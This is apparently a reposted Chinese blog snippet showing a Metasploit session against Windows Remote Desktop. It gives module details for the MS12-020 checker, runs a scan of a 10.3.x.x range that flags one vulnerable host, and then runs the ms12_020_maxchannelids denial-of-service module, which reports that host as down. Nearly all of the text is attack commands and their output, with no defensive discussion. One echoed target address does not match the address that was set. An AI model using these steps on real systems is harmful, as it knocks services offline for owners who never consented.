标签:des style http io ar os sp for on
Name: MS12-020 Microsoft Remote Desktop Checker Module: auxiliary/scanner/rdp/ms12_020_check License: Metasploit Framework License (BSD) Rank: Normal Provided by: Royce Davis "R3dy" <rdavis@accuvant.com> Brandon McCann "zeknox" <bmccann@accuvant.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 10.3.0.1/17 yes The target address range or CIDR identifier RPORT 3389 yes Remote port running RDP THREADS 50 yes The number of concurrent threads Description: This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target. References: http://cvedetails.com/cve/2012-0002/ http://technet.microsoft.com/en-us/security/bulletin/MS12-020 http://technet.microsoft.com/en-us/security/bulletin/ms12-020 http://www.exploit-db.com/exploits/18606 https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse
msf auxiliary(ms12_020_check) > run [+] 10.3.2.1:3389 Vulnerable to MS12-020 [*] Scanned 32768 of 32768 hosts (100% complete) [*] Auxiliary module execution completed
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.3.2.1 RHOST => 10.3.39.33 msf auxiliary(ms12_020_maxchannelids) > exploit [*] 10.3.2.1:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS [*] 10.3.2.1:3389 - 210 bytes sent [*] 10.3.2.1:3389 - Checking RDP status... [+] 10.3.2.1:3389 seems down [*] Auxiliary module execution completed
标签:des style http io ar os sp for on
原文地址:http://my.oschina.net/u/572632/blog/346769
